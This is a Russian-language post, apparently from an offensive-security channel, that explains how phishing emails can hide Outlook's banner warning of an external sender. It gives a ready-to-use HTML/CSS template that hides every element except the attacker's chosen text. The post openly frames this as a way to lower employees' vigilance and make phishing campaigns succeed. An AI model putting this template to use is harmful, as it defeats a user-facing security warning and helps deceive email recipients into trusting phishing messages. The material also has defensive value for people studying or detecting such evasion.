[ Когда Outlook перестает сомневаться ] Всем привет! 👋 В последнее время кампании по социальной инженерии все больше осложняются надстроенными средствами защиты. Одним из часто встречаемых механизмов является плашка в Outlook о внешнем отправителе. Думаю, многие коллеги, работающие с корпоративной почтой, не раз видели огромный алерт желто-красного цвета на пол письма с предупреждением о письме с внешнего доменного имени. Такая сигнализация резко повышает бдительность конечных пользователей, которых пытаются фишить. Однако с этим механизмом защиты есть нюанс. Недавно мы писали пост об "интернациональных XSS". Главный месседж в нем был в понимании фундаментальных основ. В этом посте я в очередной раз подсвечу, что иногда решение проблемы в offensive-индустрии может скрываться на поверхности и не требовать программирования на ассемблере с бубном в руках. Если мы сохраним письмо от "внешнего отправителя" как формат HTML в клиенте outlook-а, то увидим, что технически всё наше письмо и является HTML-кодом, в который была вставлена плашка в тело письма с сообщением, настроенным на Exchange-сервере администраторами (рис. 1). Но раз мы рассылаем письма, значит под нашим контролем всё содержимое HTML-письма, которое мы направляем и корректируем. А для обхода всплывающего содержимого нам достаточно вспомнить CSS и его возможности: попробуем запретить отображение всего кроме нашей легенды письма с помощью магии CSS: <html> <head> <style type="text/css"> body { display: none !important; background:#FFFFFF !important; } .id100500 { display: block !important; } div[style] { display: none !important; background:#FFFFFF !important; } p { display: none !important; background:#FFFFFF !important; } p[style] { display: none !important; background:#FFFFFF !important; } span { display: none !important; background: #FFFFFF !important; } span[style] { display: none !important; background:#FFFFFF !important; } table[style] { display: none !important; background:#FFFFFF !important; } table { display: none !important; background:#FFFFFF !important; } td { display: none !important; background:#FFFFFF !important; } td[style] { display: none !important; background:#FFFFFF !important; } tr { display: none !important; background:#FFFFFF !important; } tr[style] { display: none !important; background:#FFFFFF !important; } tbody { background:#FFFFFF !important; display: none !important; } tbody[style] { display: none !important; background:#FFFFFF !important; } </style> </head> <body> <p class="id100500">Привет!</p> <p class="id100500">Это обманка </p> </body> </html> Здесь мы всё красим в белый кроме своего уникального class=id100500. На рис.2 пример отправки письма без указанных CSS-стилей, а на рис.3 уже с применением нашей хитрости. P/S стоит отметить, что в окне предпросмотра клиента Outlook-а текст с алертом всё ещё будет виден, если администраторы настроили вставку плашки в начало сообщения (рис. 4). Но тем не менее сама плашка визуально не отображается, и в потоке писем это может дать нам очки бонуса, как атакующим. В фишинговых кампаниях мелочей не бывает, важны детали и любые нюансы. И если даже одна эта деталь сможет снизить бдительность сотрудника, то фишинговую кампанию можно будет считать успешной. Об этой технике известно как минимум с 19-21 годов, более развернутое описание вы можете посмотреть тут, а приложенный PoC тут. Таким образом, если ты понял правила игры, то можешь их адаптировать под себя @GigaHack #social #outlook #bypass